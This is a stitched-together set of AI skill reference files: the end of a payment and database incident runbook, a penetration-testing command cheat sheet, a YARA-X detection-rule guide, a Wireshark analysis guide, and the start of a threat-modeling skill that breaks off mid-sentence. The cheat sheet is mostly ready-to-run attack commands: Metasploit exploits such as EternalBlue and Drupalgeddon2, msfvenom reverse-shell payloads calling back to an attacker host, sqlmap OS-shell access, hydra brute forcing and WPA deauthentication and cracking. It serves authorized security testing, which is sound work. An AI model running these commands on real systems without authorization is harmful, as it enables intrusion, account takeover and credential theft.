- [ ] External dependencies? Check Stripe, bank API status
- [ ] Recent changes? Check deploy history
### 3. Initial Classification
| Symptom | Likely Cause | Go To Section |
|---------|--------------|---------------|
| All requests failing | Service down | Section 4.1 |
| High latency | Database/dependency | Section 4.2 |
| Partial failures | Code bug | Section 4.3 |
| Spike in errors | Traffic surge | Section 4.4 |
## Mitigation Procedures
### 4.1 Service Completely Down
```bash
# Step 1: Check pod status
kubectl get pods -n payments
# Step 2: If pods are crash-looping, check logs
kubectl logs -n payments -l app=payment-service --tail=100
# Step 3: Check recent deployments
kubectl rollout history deployment/payment-service -n payments
# Step 4: ROLLBACK if recent deploy is suspect
kubectl rollout undo deployment/payment-service -n payments
# Step 5: Scale up if resource constrained
kubectl scale deployment/payment-service -n payments --replicas=10
# Step 6: Verify recovery
kubectl rollout status deployment/payment-service -n payments
```
### 4.2 High Latency
```bash
# Step 1: Check database connections
kubectl exec -n payments deploy/payment-service -- \
curl localhost:8080/metrics | grep db_pool
# Step 2: Check slow queries (if DB issue)
psql -h $DB_HOST -U $DB_USER -c "
SELECT pid, now() - query_start AS duration, query
FROM pg_stat_activity
WHERE state = 'active' AND duration > interval '5 seconds'
ORDER BY duration DESC;"
# Step 3: Kill long-running queries if needed
psql -h $DB_HOST -U $DB_USER -c "SELECT pg_terminate_backend(pid);"
# Step 4: Check external dependency latency
curl -w "@curl-format.txt" -o /dev/null -s https://api.stripe.com/v1/health
# Step 5: Enable circuit breaker if dependency is slow
kubectl set env deployment/payment-service \
STRIPE_CIRCUIT_BREAKER_ENABLED=true -n payments
```
### 4.3 Partial Failures (Specific Errors)
```bash
# Step 1: Identify error pattern
kubectl logs -n payments -l app=payment-service --tail=500 | \
grep -i error | sort | uniq -c | sort -rn | head -20
# Step 2: Check error tracking
# Go to Sentry: https://sentry.io/payments
# Step 3: If specific endpoint, enable feature flag to disable
curl -X POST https://api.company.com/internal/feature-flags \
-d '{"flag": "DISABLE_PROBLEMATIC_FEATURE", "enabled": true}'
# Step 4: If data issue, check recent data changes
psql -h $DB_HOST -c "
SELECT * FROM audit_log
WHERE table_name = 'payment_methods'
AND created_at > now() - interval '1 hour';"
```
### 4.4 Traffic Surge
```bash
# Step 1: Check current request rate
kubectl top pods -n payments
# Step 2: Scale horizontally
kubectl scale deployment/payment-service -n payments --replicas=20
# Step 3: Enable rate limiting
kubectl set env deployment/payment-service \
RATE_LIMIT_ENABLED=true \
RATE_LIMIT_RPS=1000 -n payments
# Step 4: If attack, block suspicious IPs
kubectl apply -f - <<EOF
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: block-suspicious
namespace: payments
spec:
podSelector:
matchLabels:
app: payment-service
ingress:
- from:
- ipBlock:
cidr: 0.0.0.0/0
except:
- 192.168.1.0/24 # Suspicious range
EOF
```
## Verification Steps
```bash
# Verify service is healthy
curl -s https://api.company.com/payments/health | jq
# Verify error rate is back to normal
curl -s "http://prometheus:9090/api/v1/query?query=sum(rate(http_requests_total{status=~'5..'}[5m]))" | jq '.data.result[0].value[1]'
# Verify latency is acceptable
curl -s "http://prometheus:9090/api/v1/query?query=histogram_quantile(0.99,sum(rate(http_request_duration_seconds_bucket[5m]))by(le))" | jq
# Smoke test critical flows
./scripts/smoke-test-payments.sh
```
## Rollback Procedures
```bash
# Rollback Kubernetes deployment
kubectl rollout undo deployment/payment-service -n payments
# Rollback database migration (if applicable)
./scripts/db-rollback.sh $MIGRATION_VERSION
# Rollback feature flag
curl -X POST https://api.company.com/internal/feature-flags \
-d '{"flag": "NEW_PAYMENT_FLOW", "enabled": false}'
```
## Escalation Matrix
| Condition | Escalate To | Contact |
|-----------|-------------|---------|
| > 15 min unresolved SEV1 | Engineering Manager | @manager (Slack) |
| Data breach suspected | Security Team | #security-incidents |
| Financial impact > $10k | Finance + Legal | @finance-oncall |
| Customer communication needed | Support Lead | @support-lead |
## Communication Templates
### Initial Notification (Internal)
```
🚨 INCIDENT: Payment Service Degradation
Severity: SEV2
Status: Investigating
Impact: ~20% of payment requests failing
Start Time: [TIME]
Incident Commander: [NAME]
Current Actions:
- Investigating root cause
- Scaling up service
- Monitoring dashboards
Updates in #payments-incidents
```
### Status Update
```
📊 UPDATE: Payment Service Incident
Status: Mitigating
Impact: Reduced to ~5% failure rate
Duration: 25 minutes
Actions Taken:
- Rolled back deployment v2.3.4 → v2.3.3
- Scaled service from 5 → 10 replicas
Next Steps:
- Continuing to monitor
- Root cause analysis in progress
ETA to Resolution: ~15 minutes
```
### Resolution Notification
```
✅ RESOLVED: Payment Service Incident
Duration: 45 minutes
Impact: ~5,000 affected transactions
Root Cause: Memory leak in v2.3.4
Resolution:
- Rolled back to v2.3.3
- Transactions auto-retried successfully
Follow-up:
- Postmortem scheduled for [DATE]
- Bug fix in progress
```
```
### Template 2: Database Incident Runbook
```markdown
# Database Incident Runbook
## Quick Reference
| Issue | Command |
|-------|---------|
| Check connections | `SELECT count(*) FROM pg_stat_activity;` |
| Kill query | `SELECT pg_terminate_backend(pid);` |
| Check replication lag | `SELECT extract(epoch from (now() - pg_last_xact_replay_timestamp()));` |
| Check locks | `SELECT * FROM pg_locks WHERE NOT granted;` |
## Connection Pool Exhaustion
```sql
-- Check current connections
SELECT datname, usename, state, count(*)
FROM pg_stat_activity
GROUP BY datname, usename, state
ORDER BY count(*) DESC;
-- Identify long-running connections
SELECT pid, usename, datname, state, query_start, query
FROM pg_stat_activity
WHERE state != 'idle'
ORDER BY query_start;
-- Terminate idle connections
SELECT pg_terminate_backend(pid)
FROM pg_stat_activity
WHERE state = 'idle'
AND query_start < now() - interval '10 minutes';
```
## Replication Lag
```sql
-- Check lag on replica
SELECT
CASE
WHEN pg_last_wal_receive_lsn() = pg_last_wal_replay_lsn() THEN 0
ELSE extract(epoch from now() - pg_last_xact_replay_timestamp())
END AS lag_seconds;
-- If lag > 60s, consider:
-- 1. Check network between primary/replica
-- 2. Check replica disk I/O
-- 3. Consider failover if unrecoverable
```
## Disk Space Critical
```bash
# Check disk usage
df -h /var/lib/postgresql/data
# Find large tables
psql -c "SELECT relname, pg_size_pretty(pg_total_relation_size(relid))
FROM pg_catalog.pg_statio_user_tables
ORDER BY pg_total_relation_size(relid) DESC
LIMIT 10;"
# VACUUM to reclaim space
psql -c "VACUUM FULL large_table;"
# If emergency, delete old data or expand disk
```
```
## Best Practices
### Do's
- **Keep runbooks updated** - Review after every incident
- **Test runbooks regularly** - Game days, chaos engineering
- **Include rollback steps** - Always have an escape hatch
- **Document assumptions** - What must be true for steps to work
- **Link to dashboards** - Quick access during stress
### Don'ts
- **Don't assume knowledge** - Write for 3 AM brain
- **Don't skip verification** - Confirm each step worked
- **Don't forget communication** - Keep stakeholders informed
- **Don't work alone** - Escalate early
- **Don't skip postmortems** - Learn from every incident
## Resources
- [Google SRE Book - Incident Management](https://sre.google/sre-book/managing-incidents/)
- [PagerDuty Incident Response](https://response.pagerduty.com/)
- [Atlassian Incident Management](https://www.atlassian.com/incident-management)
Essential penetration testing command reference. Quick lookup for nmap, Metasploit, hydra, john, nikto, gobuster, and other offensive security tools. Covers...
--- name: Pentest Commands version: 1.0.0 description: "Essential penetration testing command reference. Quick lookup for nmap, Metasploit, hydra, john, nikto, gobuster, and other offensive security tools. Covers reconnaissance, exploitation, post-exploitation, and lateral movement." metadata: author: zebbern version: "1.1" --- # Pentest Commands ## Purpose Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments. ## Inputs/Prerequisites - Kali Linux or penetration testing distribution - Target IP addresses with authorization - Wordlists for brute forcing - Network access to target systems - Basic understanding of tool syntax ## Outputs/Deliverables - Network enumeration results - Identified vulnerabilities - Exploitation payloads - Cracked credentials - Web vulnerability findings ## Core Workflow ### 1. Nmap Commands **Host Discovery:** ```bash # Ping sweep nmap -sP 192.168.1.0/24 # List IPs without scanning nmap -sL 192.168.1.0/24 # Ping scan (host discovery) nmap -sn 192.168.1.0/24 ``` **Port Scanning:** ```bash # TCP SYN scan (stealth) nmap -sS 192.168.1.1 # Full TCP connect scan nmap -sT 192.168.1.1 # UDP scan nmap -sU 192.168.1.1 # All ports (1-65535) nmap -p- 192.168.1.1 # Specific ports nmap -p 22,80,443 192.168.1.1 ``` **Service Detection:** ```bash # Service versions nmap -sV 192.168.1.1 # OS detection nmap -O 192.168.1.1 # Comprehensive scan nmap -A 192.168.1.1 # Skip host discovery nmap -Pn 192.168.1.1 ``` **NSE Scripts:** ```bash # Vulnerability scan nmap --script vuln 192.168.1.1 # SMB enumeration nmap --script smb-enum-shares -p 445 192.168.1.1 # HTTP enumeration nmap --script http-enum -p 80 192.168.1.1 # Check EternalBlue nmap --script smb-vuln-ms17-010 192.168.1.1 # Check MS08-067 nmap --script smb-vuln-ms08-067 192.168.1.1 # SSH brute force nmap --script ssh-brute -p 22 192.168.1.1 # FTP anonymous nmap --script ftp-anon 192.168.1.1 # DNS brute force nmap --script dns-brute 192.168.1.1 # HTTP methods nmap -p80 --script http-methods 192.168.1.1 # HTTP headers nmap -p80 --script http-headers 192.168.1.1 # SQL injection check nmap --script http-sql-injection -p 80 192.168.1.1 ``` **Advanced Scans:** ```bash # Xmas scan nmap -sX 192.168.1.1 # ACK scan (firewall detection) nmap -sA 192.168.1.1 # Window scan nmap -sW 192.168.1.1 # Traceroute nmap --traceroute 192.168.1.1 ``` ### 2. Metasploit Commands **Basic Usage:** ```bash # Launch Metasploit msfconsole # Search for exploits search type:exploit name:smb # Use exploit use exploit/windows/smb/ms17_010_eternalblue # Show options show options # Set target set RHOST 192.168.1.1 # Set payload set PAYLOAD windows/meterpreter/reverse_tcp # Run exploit exploit ``` **Common Exploits:** ```bash # EternalBlue msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit" # MS08-067 (Conficker) msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit" # vsftpd backdoor msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit" # Shellshock msfconsole -x "use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit" # Drupalgeddon2 msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit" # PSExec msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit" ``` **Scanners:** ```bash # TCP port scan msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run" # SMB version scan msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run" # SMB share enumeration msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run" # SSH brute force msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run" # FTP brute force msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run" # RDP scanning msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run" ``` **Handler Setup:** ```bash # Multi-handler for reverse shells msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit" ``` **Payload Generation (msfvenom):** ```bash # Windows reverse shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe # Linux reverse shell msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf # PHP reverse shell msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php # ASP reverse shell msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp # WAR file msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war # Python payload msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py ``` ### 3. Nikto Commands ```bash # Basic scan nikto -h http://192.168.1.1 # Comprehensive scan nikto -h http://192.168.1.1 -C all # Output to file nikto -h http://192.168.1.1 -output report.html # Plugin-based scans nikto -h http://192.168.1.1 -Plugins robots nikto -h http://192.168.1.1 -Plugins shellshock nikto -h http://192.168.1.1 -Plugins heartbleed nikto -h http://192.168.1.1 -Plugins ssl # Export to Metasploit nikto -h http://192.168.1.1 -Format msf+ # Specific tuning nikto -h http://192.168.1.1 -Tuning 1 # Interesting files only ``` ### 4. SQLMap Commands ```bash # Basic injection test sqlmap -u "http://192.168.1.1/page?id=1" # Enumerate databases sqlmap -u "http://192.168.1.1/page?id=1" --dbs # Enumerate tables sqlmap -u "http://192.168.1.1/page?id=1" -D database --tables # Dump table sqlmap -u "http://192.168.1.1/page?id=1" -D database -T users --dump # OS shell sqlmap -u "http://192.168.1.1/page?id=1" --os-shell # POST request sqlmap -u "http://192.168.1.1/login" --data="user=admin&pass=test" # Cookie injection sqlmap -u "http://192.168.1.1/page" --cookie="id=1*" # Bypass WAF sqlmap -u "http://192.168.1.1/page?id=1" --tamper=space2comment # Risk and level sqlmap -u "http://192.168.1.1/page?id=1" --risk=3 --level=5 ``` ### 5. Hydra Commands ```bash # SSH brute force hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1 # FTP brute force hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1 # HTTP POST form hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid" # HTTP Basic Auth hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/ # SMB brute force hydra -l admin -P passwords.txt smb://192.168.1.1 # RDP brute force hydra -l admin -P passwords.txt rdp://192.168.1.1 # MySQL brute force hydra -l root -P passwords.txt mysql://192.168.1.1 # Username list hydra -L users.txt -P passwords.txt ssh://192.168.1.1 ``` ### 6. John the Ripper Commands ```bash # Crack password file john hash.txt # Specify wordlist john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt # Show cracked passwords john hash.txt --show # Specify format john hash.txt --format=raw-md5 john hash.txt --format=nt john hash.txt --format=sha512crypt # SSH key passphrase ssh2john id_rsa > ssh_hash.txt john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt # ZIP password zip2john file.zip > zip_hash.txt john zip_hash.txt ``` ### 7. Aircrack-ng Commands ```bash # Monitor mode airmon-ng start wlan0 # Capture packets airodump-ng wlan0mon # Target specific network airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon # Deauth attack aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon # Crack WPA handshake aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap ``` ### 8. Wireshark/Tshark Commands ```bash # Capture traffic tshark -i eth0 -w capture.pcap # Read capture file tshark -r capture.pcap # Filter by protocol tshark -r capture.pcap -Y "http" # Filter by IP tshark -r capture.pcap -Y "ip.addr == 192.168.1.1" # Extract HTTP data tshark -r capture.pcap -Y "http" -T fields -e http.request.uri ``` ## Quick Reference ### Common Port Scans ```bash # Quick scan nmap -F 192.168.1.1 # Full comprehensive nmap -sV -sC -A -p- 192.168.1.1 # Fast with version nmap -sV -T4 192.168.1.1 ``` ### Password Hash Types | Mode | Type | |------|------| | 0 | MD5 | | 100 | SHA1 | | 1000 | NTLM | | 1800 | sha512crypt | | 3200 | bcrypt | | 13100 | Kerberoast | ## Constraints - Always have written authorization - Some scans are noisy and detectable - Brute forcing may lock accounts - Rate limiting affects tools ## Examples ### Example 1: Quick Vulnerability Scan ```bash nmap -sV --script vuln 192.168.1.1 ``` ### Example 2: Web App Test ```bash nikto -h http://target && sqlmap -u "http://target/page?id=1" --dbs ``` ## Troubleshooting | Issue | Solution | |-------|----------| | Scan too slow | Increase timing (-T4, -T5) | | Ports filtered | Try different scan types | | Exploit fails | Check target version compatibility | | Passwords not cracking | Try larger wordlists, rules |
Write high-quality YARA-X detection rules for malware hunting. Covers atom selection, string optimization, false positive reduction, module usage (PE, ELF, M...
---
name: yara-authoring
version: 1.0.0
description: "Write high-quality YARA-X detection rules for malware hunting. Covers atom selection, string optimization, false positive reduction, module usage (PE, ELF, Macho), and Trail of Bits methodology. Includes rule templates and testing workflows."
---
# YARA-X Rule Authoring
Write detection rules that catch malware without drowning in false positives. Based on Trail of Bits methodology.
## Core Principles
1. **Strings must generate good atoms** — YARA extracts 4-byte subsequences for fast matching. Strings with repeated bytes, common sequences, or under 4 bytes force slow bytecode scans.
2. **Target specific families, not categories** — "Detects ransomware" is useless. "Detects LockBit 3.0 config extraction routine" is useful.
3. **Test against goodware** — Validate against clean file sets before deployment.
4. **Short-circuit with cheap checks first** — `filesize < 10MB and uint16(0) == 0x5A4D` before expensive string searches.
5. **Metadata is documentation** — Future you needs to know what this catches and why.
## YARA-X Basics
YARA-X is the Rust successor to legacy YARA: 5-10x faster, better errors, built-in formatter, stricter validation, new modules (crx, dex).
**Install:** `brew install yara-x` / `cargo install yara-x`
**Commands:** `yr scan`, `yr check`, `yr fmt`, `yr dump`
## Rule Template
```yara
import "pe"
rule FamilyName_Variant_Technique : tag1 tag2 {
meta:
author = "Your Name"
date = "2026-02-14"
description = "Detects [specific behavior] in [malware family]"
reference = "https://..."
tlp = "TLP:WHITE"
hash = ""
score = 75 // 0-100 confidence
strings:
// Unique strings from the sample
$api1 = "VirtualAllocEx" ascii
$api2 = "WriteProcessMemory" ascii
$str1 = { 48 8B 05 ?? ?? ?? ?? 48 85 C0 } // hex with wildcards
$pdb = /[A-Z]:\\.*\\Release\\.*\.pdb/ nocase
condition:
uint16(0) == 0x5A4D and
filesize < 5MB and
(2 of ($api*) and $str1) or
$pdb
}
```
## Naming Convention
`Family_Variant_Technique` — examples:
- `Emotet_Loader_DocumentMacro`
- `CobaltStrike_Beacon_x64`
- `Generic_Cryptominer_XMRig`
## String Selection
**Good strings (unique, specific):**
- Mutex names, PDB paths, C2 URLs
- Unique byte sequences from disassembly
- Custom encryption constants
- Uncommon API call sequences
**Bad strings (too common, high FP):**
- `http://`, `https://`, common API names alone
- Single common words, short strings (<4 bytes)
- Strings found in Windows system files
## Condition Patterns
```yara
// Performance-ordered (cheap → expensive)
condition:
uint16(0) == 0x5A4D and // Magic bytes (instant)
filesize < 10MB and // Size filter (instant)
2 of ($unique*) and // String matching (fast)
pe.imports("kernel32.dll") // Module check (slower)
```
**Common magic bytes:**
| Platform | Check |
|----------|-------|
| PE (Windows) | `uint16(0) == 0x5A4D` |
| ELF (Linux) | `uint32(0) == 0x464C457F` |
| Mach-O 64-bit | `uint32(0) == 0xFEEDFACF` |
| PDF | `uint32(0) == 0x25504446` |
| Office/ZIP | `uint32(0) == 0x504B0304` |
## Performance Rules
1. Put `filesize` and magic byte checks FIRST in condition
2. Never use unbounded regex like `/.*/`
3. Avoid `for all` with complex conditions on large files
4. Use `ascii` or `wide`, not both unless needed
5. Hex strings with specific bytes > wildcards > regex
6. Use `at` for fixed offsets instead of scanning entire file
## Testing
```bash
# Validate syntax
yr check rules/
# Scan a sample
yr scan rules/my_rule.yar suspicious_file.exe
# Scan directory
yr scan rules/ samples/ --threads 4
# Format rules consistently
yr fmt rules/my_rule.yar
```
## False Positive Reduction
- Add `filesize` constraints (malware has typical size ranges)
- Require multiple string matches (`2 of ($str*)` not `any of`)
- Exclude known good paths/publishers via `not` conditions
- Score-based approach: assign confidence scores in metadata, triage by threshold
- Test against goodware corpus before deployment
## Reference
Full methodology, module docs (pe, elf, crx, dex), and migration guide from legacy YARA:
https://github.com/trailofbits/skills/tree/main/plugins/yara-authoring
Network traffic analysis with Wireshark and tshark. Capture packets, write display and BPF filters, follow TCP/UDP/TLS streams, detect C2 beacons, troublesho...
--- name: Wireshark Network Traffic Analysis version: 1.0.0 description: "Network traffic analysis with Wireshark and tshark. Capture packets, write display and BPF filters, follow TCP/UDP/TLS streams, detect C2 beacons, troubleshoot connectivity, and perform forensic PCAP analysis." metadata: author: zebbern version: "1.1" --- # Wireshark Network Traffic Analysis ## Purpose Execute comprehensive network traffic analysis using Wireshark to capture, filter, and examine network packets for security investigations, performance optimization, and troubleshooting. This skill enables systematic analysis of network protocols, detection of anomalies, and reconstruction of network conversations from PCAP files. ## Inputs / Prerequisites ### Required Tools - Wireshark installed (Windows, macOS, or Linux) - Network interface with capture permissions - PCAP/PCAPNG files for offline analysis - Administrator/root privileges for live capture ### Technical Requirements - Understanding of network protocols (TCP, UDP, HTTP, DNS) - Familiarity with IP addressing and ports - Knowledge of OSI model layers - Understanding of common attack patterns ### Use Cases - Network troubleshooting and connectivity issues - Security incident investigation - Malware traffic analysis - Performance monitoring and optimization - Protocol learning and education ## Outputs / Deliverables ### Primary Outputs - Filtered packet captures for specific traffic - Reconstructed communication streams - Traffic statistics and visualizations - Evidence documentation for incidents ## Core Workflow ### Phase 1: Capturing Network Traffic #### Start Live Capture Begin capturing packets on network interface: ``` 1. Launch Wireshark 2. Select network interface from main screen 3. Click shark fin icon or double-click interface 4. Capture begins immediately ``` #### Capture Controls | Action | Shortcut | Description | |--------|----------|-------------| | Start/Stop Capture | Ctrl+E | Toggle capture on/off | | Restart Capture | Ctrl+R | Stop and start new capture | | Open PCAP File | Ctrl+O | Load existing capture file | | Save Capture | Ctrl+S | Save current capture | #### Capture Filters Apply filters before capture to limit data collection: ``` # Capture only specific host host 192.168.1.100 # Capture specific port port 80 # Capture specific network net 192.168.1.0/24 # Exclude specific traffic not arp # Combine filters host 192.168.1.100 and port 443 ``` ### Phase 2: Display Filters #### Basic Filter Syntax Filter captured packets for analysis: ``` # IP address filters ip.addr == 192.168.1.1 # All traffic to/from IP ip.src == 192.168.1.1 # Source IP only ip.dst == 192.168.1.1 # Destination IP only # Port filters tcp.port == 80 # TCP port 80 udp.port == 53 # UDP port 53 tcp.dstport == 443 # Destination port 443 tcp.srcport == 22 # Source port 22 ``` #### Protocol Filters Filter by specific protocols: ``` # Common protocols http # HTTP traffic https or ssl or tls # Encrypted web traffic dns # DNS queries and responses ftp # FTP traffic ssh # SSH traffic icmp # Ping/ICMP traffic arp # ARP requests/responses dhcp # DHCP traffic smb or smb2 # SMB file sharing ``` #### TCP Flag Filters Identify specific connection states: ``` tcp.flags.syn == 1 # SYN packets (connection attempts) tcp.flags.ack == 1 # ACK packets tcp.flags.fin == 1 # FIN packets (connection close) tcp.flags.reset == 1 # RST packets (connection reset) tcp.flags.syn == 1 && tcp.flags.ack == 0 # SYN-only (initial connection) ``` #### Content Filters Search for specific content: ``` frame contains "password" # Packets containing string http.request.uri contains "login" # HTTP URIs with string tcp contains "GET" # TCP packets with string ``` #### Analysis Filters Identify potential issues: ``` tcp.analysis.retransmission # TCP retransmissions tcp.analysis.duplicate_ack # Duplicate ACKs tcp.analysis.zero_window # Zero window (flow control) tcp.analysis.flags # Packets with issues dns.flags.rcode != 0 # DNS errors ``` #### Combining Filters Use logical operators for complex queries: ``` # AND operator ip.addr == 192.168.1.1 && tcp.port == 80 # OR operator dns || http # NOT operator !(arp || icmp) # Complex combinations (ip.src == 192.168.1.1 || ip.src == 192.168.1.2) && tcp.port == 443 ``` ### Phase 3: Following Streams #### TCP Stream Reconstruction View complete TCP conversation: ``` 1. Right-click on any TCP packet 2. Select Follow > TCP Stream 3. View reconstructed conversation 4. Toggle between ASCII, Hex, Raw views 5. Filter to show only this stream ``` #### Stream Types | Stream | Access | Use Case | |--------|--------|----------| | TCP Stream | Follow > TCP Stream | Web, file transfers, any TCP | | UDP Stream | Follow > UDP Stream | DNS, VoIP, streaming | | HTTP Stream | Follow > HTTP Stream | Web content, headers | | TLS Stream | Follow > TLS Stream | Encrypted traffic (if keys available) | #### Stream Analysis Tips - Review request/response pairs - Identify transmitted files or data - Look for credentials in plaintext - Note unusual patterns or commands ### Phase 4: Statistical Analysis #### Protocol Hierarchy View protocol distribution: ``` Statistics > Protocol Hierarchy Shows: - Percentage of each protocol - Packet counts - Bytes transferred - Protocol breakdown tree ``` #### Conversations Analyze communication pairs: ``` Statistics > Conversations Tabs: - Ethernet: MAC address pairs - IPv4/IPv6: IP address pairs - TCP: Connection details (ports, bytes, packets) - UDP: Datagram exchanges ``` #### Endpoints View active network participants: ``` Statistics > Endpoints Shows: - All source/destination addresses - Packet and byte counts - Geographic information (if enabled) ``` #### Flow Graph Visualize packet sequence: ``` Statistics > Flow Graph Options: - All packets or displayed only - Standard or TCP flow - Shows packet timing and direction ``` #### I/O Graphs Plot traffic over time: ``` Statistics > I/O Graph Features: - Packets per second - Bytes per second - Custom filter graphs - Multiple graph overlays ``` ### Phase 5: Security Analysis #### Detect Port Scanning Identify reconnaissance activity: ``` # SYN scan detection (many ports, same source) ip.src == SUSPECT_IP && tcp.flags.syn == 1 # Review Statistics > Conversations for anomalies # Look for single source hitting many destination ports ``` #### Identify Suspicious Traffic Filter for anomalies: ``` # Traffic to unusual ports tcp.dstport > 1024 && tcp.dstport < 49152 # Traffic outside trusted network !(ip.addr == 192.168.1.0/24) # Unusual DNS queries dns.qry.name contains "suspicious-domain" # Large data transfers frame.len > 1400 ``` #### ARP Spoofing Detection Identify ARP attacks: ``` # Duplicate ARP responses arp.duplicate-address-frame # ARP traffic analysis arp # Look for: # - Multiple MACs for same IP # - Gratuitous ARP floods # - Unusual ARP patterns ``` #### Examine Downloads Analyze file transfers: ``` # HTTP file downloads http.request.method == "GET" && http contains "Content-Disposition" # Follow HTTP Stream to view file content # Use File > Export Objects > HTTP to extract files ``` #### DNS Analysis Investigate DNS activity: ``` # All DNS traffic dns # DNS queries only dns.flags.response == 0 # DNS responses only dns.flags.response == 1 # Failed DNS lookups dns.flags.rcode != 0 # Specific domain queries dns.qry.name contains "domain.com" ``` ### Phase 6: Expert Information #### Access Expert Analysis View Wireshark's automated findings: ``` Analyze > Expert Information Categories: - Errors: Critical issues - Warnings: Potential problems - Notes: Informational items - Chats: Normal conversation events ``` #### Common Expert Findings | Finding | Meaning | Action | |---------|---------|--------| | TCP Retransmission | Packet resent | Check for packet loss | | Duplicate ACK | Possible loss | Investigate network path | | Zero Window | Buffer full | Check receiver performance | | RST | Connection reset | Check for blocks/errors | | Out-of-Order | Packets reordered | Usually normal, excessive is issue | ## Quick Reference ### Keyboard Shortcuts | Action | Shortcut | |--------|----------| | Open file | Ctrl+O | | Save file | Ctrl+S | | Start/Stop capture | Ctrl+E | | Find packet | Ctrl+F | | Go to packet | Ctrl+G | | Next packet | ↓ | | Previous packet | ↑ | | First packet | Ctrl+Home | | Last packet | Ctrl+End | | Apply filter | Enter | | Clear filter | Ctrl+Shift+X | ### Common Filter Reference ``` # Web traffic http || https # Email smtp || pop || imap # File sharing smb || smb2 || ftp # Authentication ldap || kerberos # Network management snmp || icmp # Encrypted tls || ssl ``` ### Export Options ``` File > Export Specified Packets # Save filtered subset File > Export Objects > HTTP # Extract HTTP files File > Export Packet Dissections # Export as text/CSV ``` ## Constraints and Guardrails ### Operational Boundaries - Capture only authorized network traffic - Handle captured data according to privacy policies - Avoid capturing sensitive credentials unnecessarily - Properly secure PCAP files containing sensitive data ### Technical Limitations - Large captures consume significant memory - Encrypted traffic content not visible without keys - High-speed networks may drop packets - Some protocols require plugins for full decoding ### Best Practices - Use capture filters to limit data collection - Save captures regularly during long sessions - Use display filters rather than deleting packets - Document analysis findings and methodology ## Examples ### Example 1: HTTP Credential Analysis **Scenario**: Investigate potential plaintext credential transmission ``` 1. Filter: http.request.method == "POST" 2. Look for login forms 3. Follow HTTP Stream 4. Search for username/password parameters ``` **Finding**: Credentials transmitted in cleartext form data. ### Example 2: Malware C2 Detection **Scenario**: Identify command and control traffic ``` 1. Filter: dns 2. Look for unusual query patterns 3. Check for high-frequency beaconing 4. Identify domains with random-looking names 5. Filter: ip.dst == SUSPICIOUS_IP 6. Analyze traffic patterns ``` **Indicators**: - Regular timing intervals - Encoded/encrypted payloads - Unusual ports or protocols ### Example 3: Network Troubleshooting **Scenario**: Diagnose slow web application ``` 1. Filter: ip.addr == WEB_SERVER 2. Check Statistics > Service Response Time 3. Filter: tcp.analysis.retransmission 4. Review I/O Graph for patterns 5. Check for high latency or packet loss ``` **Finding**: TCP retransmissions indicating network congestion. ## Troubleshooting ### No Packets Captured - Verify correct interface selected - Check for admin/root permissions - Confirm network adapter is active - Disable promiscuous mode if issues persist ### Filter Not Working - Verify filter syntax (red = error) - Check for typos in field names - Use Expression button for valid fields - Clear filter and rebuild incrementally ### Performance Issues - Use capture filters to limit traffic - Split large captures into smaller files - Disable name resolution during capture - Close unnecessary protocol dissectors ### Cannot Decrypt TLS/SSL - Obtain server private key - Configure at Edit > Preferences > Protocols > TLS - For ephemeral keys, capture pre-master secret from browser - Some modern ciphers cannot be decrypted passively
Threat modeling with STRIDE, PASTA, and attack trees. Analyze architectures for security gaps, extract security requirements, build data flow diagrams, and p...
--- name: threat-modeling-expert version: 1.0.0 description: "Threat modeling with STRIDE, PASTA, and attack trees. Analyze architectures for security gaps, extract security requirements, build data flow diagrams, and prioritize risks. For secure-by-design planning and security architecture reviews." --- # Threat Modeling Expert Expert in threat modeling methodologies, security architecture review, and risk assessment. Masters STRIDE, PASTA, attack trees, and security requirement extraction. Use PROACTIVELY for security architecture reviews, threat identification, or building secure-by-design systems. ## Capabilities - STRIDE threat analysis - Attack tree construction - Data flow diagram analysis - Security requirement extraction - Risk prioritization and scoring - Mitigation strategy design - Security control mapping ## Use this skill when - Designing new systems or features - Reviewing architecture for security gaps - Preparing for security audits - Identifying attack vectors - Prioritizing security investments - Creating security documentation - Training teams on 